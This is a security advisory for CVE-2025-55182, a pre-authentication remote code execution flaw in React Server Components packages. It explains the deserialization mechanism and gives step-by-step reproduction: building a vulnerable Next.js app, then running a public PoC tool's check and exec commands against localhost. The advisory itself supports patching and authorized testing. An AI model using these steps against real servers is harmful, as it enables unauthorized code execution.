# CVE-2025-55182

## Summary

Pre-authentication RCE in React Server Components (react-server-dom-* 19.0.0–19.2.0) via unsafe deserialization of Server Function requests.

## Description

## Summary
A pre-authentication remote code execution vulnerability affects React Server Components packages `react-server-dom-webpack`, `react-server-dom-parcel`, and `react-server-dom-turbopack` in versions 19.0.0, 19.1.0–19.1.1, and 19.2.0. The server-side decoding of React Server Function requests unsafely deserializes attacker-controlled payloads, allowing an unauthenticated attacker to craft a malicious HTTP request and achieve arbitrary code execution.

## Details
React Server Components (Flight protocol) translate client requests into HTTP requests for Server Function endpoints. The vulnerable code path deserializes attacker-controlled `multipart/form-data` without sufficient validation, enabling prototype-chain manipulation that can reach the `Function` constructor (e.g., via crafted references such as `$1:__proto__:then` and `$1:constructor:constructor`). A single unauthenticated POST request containing a `Next-Action` header can trigger RCE on the server. This impacts applications that use React Server Components through frameworks/bundlers (e.g., Next.js App Router) when these packages are present.

**Fixed versions:** 19.0.1, 19.1.2, and 19.2.1 (or later) of the affected packages.

## Reproduction Steps (authorized testing only)
**Environment:** Node.js 20+, npm, Python 3, a vulnerable RSC-enabled app (example: Next.js App Router). The steps below create a local vulnerable target and use a public PoC to verify exploitation.

1) **Create a vulnerable Next.js app**
```bash
npx create-next-app@15.4.0 rsc-vuln
cd rsc-vuln
npm install react@19.2.0 react-dom@19.2.0 react-server-dom-webpack@19.2.0
```

2) **Add a simple Server Action to ensure a Server Function endpoint exists**
`app/actions.ts`:
```ts
'use server';
export async function ping() {
  return 'ok';
}
```
`app/page.tsx`:
```tsx
import { ping } from './actions';
export default function Page() {
  return (
    <form action={ping}>
      <button type="submit">Ping</button>
    </form>
  );
}
```

3) **Run the vulnerable app**
```bash
npm run dev
```
(Leave it running on `http://localhost:3000`.)

4) **Clone and install the PoC tool**
```bash
git clone https://github.com/rvzsec/react2shell
cd react2shell
pip3 install -r requirements.txt
```

5) **Check and exploit**
```bash
python3 react2shell.py check -t http://localhost:3000
python3 react2shell.py exec  -t http://localhost:3000 -c "id"
```

## Indicators of Success
- The PoC reports the target as vulnerable.
- The `exec` command returns output such as the server process user (`uid=`/`gid=`), confirming code execution.

## Notes
- If your application does not use React Server Components or does not run server-side React code, it is not affected.
- Upgrade to patched versions immediately: 19.0.1, 19.1.2, or 19.2.1+.


## Metadata

- Product: npm:react-server-dom-webpack
- Severity: critical
- Status: open
